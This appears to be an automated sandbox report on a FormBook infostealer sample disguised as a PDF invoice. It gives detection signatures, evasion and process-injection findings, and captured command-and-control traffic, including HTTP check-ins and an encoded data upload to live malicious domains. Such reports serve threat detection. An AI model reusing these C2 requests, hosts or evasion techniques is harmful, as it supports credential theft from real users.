Windows Analysis Report
ORIGINAL INVOICE COAU7230734298.pdf.exe

Overview

General Information

Sample name: ORIGINAL INVOICE COAU7230734298.pdf.exe
Analysis ID: 1523775
MD5: 7d3ee1a73d9fbef171c785801ffcaff2
SHA1: 2ad9a95c9038e4d61c6d9cbee63746454454d502
SHA256: 1897d47010a97079de62b957827fbecbdb4690ead4a51417fa6f1dccfc19f6c5
Tags: exe, user-ngokoptmp

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

AV Detection

Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Virustotal: Detection: 38%
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe ReversingLabs: Detection: 28%
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Joe Sandbox ML: detected
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Hx.pdbSHA256 source: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fFUkGixTNm.exe, 00000007.00000002.2930068881.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp, fFUkGixTNm.exe, 00000009.00000002.2929589735.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdbGCTL source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hx.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0327C000 FindFirstFileW,FindNextFileW,FindClose, 8_2_0327C000
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 4x nop then xor eax, eax 8_2_03269B70
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 4x nop then mov ebx, 00000004h 8_2_03D304DE
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 4x nop then pop edi 9_2_058C2FA0
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 4x nop then xor eax, eax 9_2_058C7839
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 4x nop then pop edi 9_2_058D2ACE

Networking

Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56830 -> 185.106.176.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56834 -> 52.223.13.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56825 -> 85.159.66.93:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56835 -> 52.223.13.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56827 -> 85.159.66.93:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56833 -> 52.223.13.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56829 -> 185.106.176.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56831 -> 185.106.176.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56826 -> 85.159.66.93:80
Source: DNS query: www.kartal-nakliyat.xyz
Source: Joe Sandbox View IP Address: 52.223.13.41
Source: Joe Sandbox View ASN Name: AMAZONEXPANSIONGB
Source: Joe Sandbox View ASN Name: AS_LYREG3FR
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /pyhp/?5lFl=AhoHbVV8w8Fhov&-L=acxrSkAeFAn+c73u09IRBa4IAQi5A1z7ZI6dwDB31LKHDk9U9aCGF5xgW/dUXTEZ5HtK9ZQYYeKWJ5O00arwvLVjsQ/IAPNwWm6am1xvCJN+TihMUZXrkzI= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-us Connection: close Host: www.yippie.world User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /n8ew/?-L=YrE+HYcRTJ/OeXavXWmi0WsMxqp/Qj1TC8eaJJaWkX68lODBlWDwQ18bVJjKs/Cf7bGV7reziuqKeQkAFQFGt8cheHN72b7qcqvkvKEYShiE16kKqs7vQFQ=&5lFl=AhoHbVV8w8Fhov HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-us Connection: close Host: www.kartal-nakliyat.xyz User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /c6mm/?-L=605lt7jFydoU7JlJmLmlR3MPZVvrIrf93PMCsOoFpo6XmjZ52y5IXJzTkSO6xf5k8c4UHFGKgBYSwhM4U1695pryhegOugHUsMzW6k0CmFF9ZZ6niG5/hdc=&5lFl=AhoHbVV8w8Fhov HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-us Connection: close Host: www.sidqwdf.fun User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /sfpe/?-L=sfhD9ka1f7Zl+qNrDMj9KQZnnhuUSPArAKQ60GHQT7zGoqr1MFveBg7/TQ1R28eaU1mFht6SOS1vYGyl5v5sWa+Vgmcag1rYJ6bZGh78paZg7QH5mUVjdRg=&5lFl=AhoHbVV8w8Fhov HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-us Connection: close Host: www.resellnexa.shop User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic DNS traffic detected: DNS query: www.yippie.world
Source: global traffic DNS traffic detected: DNS query: www.kartal-nakliyat.xyz
Source: global traffic DNS traffic detected: DNS query: www.sidqwdf.fun
Source: global traffic DNS traffic detected: DNS query: www.resellnexa.shop
Source: unknown HTTP traffic detected: POST /n8ew/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Connection: close Cache-Control: max-age=0 Content-Length: 199 Content-Type: application/x-www-form-urlencoded Host: www.kartal-nakliyat.xyz Origin: http://www.kartal-nakliyat.xyz Referer: http://www.kartal-nakliyat.xyz/n8ew/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E) Data Ascii: -L=VpseEu0Le7StXxKfNhik5nx++ZgIRSxCSdiOR82VvmGHveO3pBT7RXc+c9vTioOExp/UmLiKq5qidVFVEgdb4LQtLDkm7KPFUq2b17EMbgykw58BtK/3IQ2uTP1RVz8+GcDnHTlJs2qdA1bOjwuW9LiF3GPk2JkgrY/jYZdh5ou+maEaUNqMAxyLkgCdzQOkrQ==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Wed, 02 Oct 2024 00:06:34 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-10-02T00:06:39.8601907Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 02 Oct 2024 00:06:41 GMT Content-Type: text/html; charset=utf-8 Content-Length: 555 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 02 Oct 2024 00:06:44 GMT Content-Type: text/html; charset=utf-8 Content-Length: 555 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 02 Oct 2024 00:06:46 GMT Content-Type: text/html; charset=utf-8 Content-Length: 555 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 02 Oct 2024 00:06:49 GMT Content-Type: text/html; charset=utf-8 Content-Length: 555 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693090420.0000000005A07000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlru-ru
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: fFUkGixTNm.exe, 00000009.00000002.2932524352.000000000590D000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.resellnexa.shop
Source: fFUkGixTNm.exe, 00000009.00000002.2932524352.000000000590D000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.resellnexa.shop/sfpe/
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033y
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: RpcPing.exe, 00000008.00000003.2428440920.00000000084B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: initial sample Static PE information: Filename: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0042BFF3 NtClose, 3_2_0042BFF3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52B60 NtClose,LdrInitializeThunk, 3_2_01A52B60
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52DF0 NtQuerySystemInformation,LdrInitializeThunk, 3_2_01A52DF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52C70 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_01A52C70
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A535C0 NtCreateMutant,LdrInitializeThunk, 3_2_01A535C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A54340 NtSetContextThread, 3_2_01A54340
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A54650 NtSuspendThread, 3_2_01A54650
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52BA0 NtEnumerateValueKey, 3_2_01A52BA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52B80 NtQueryInformationFile, 3_2_01A52B80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52BE0 NtQueryValueKey, 3_2_01A52BE0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52BF0 NtAllocateVirtualMemory, 3_2_01A52BF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52AB0 NtWaitForSingleObject, 3_2_01A52AB0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52AF0 NtWriteFile, 3_2_01A52AF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52AD0 NtReadFile, 3_2_01A52AD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A52DB0 NtEnumerateKey, 3_2_01A52DB0
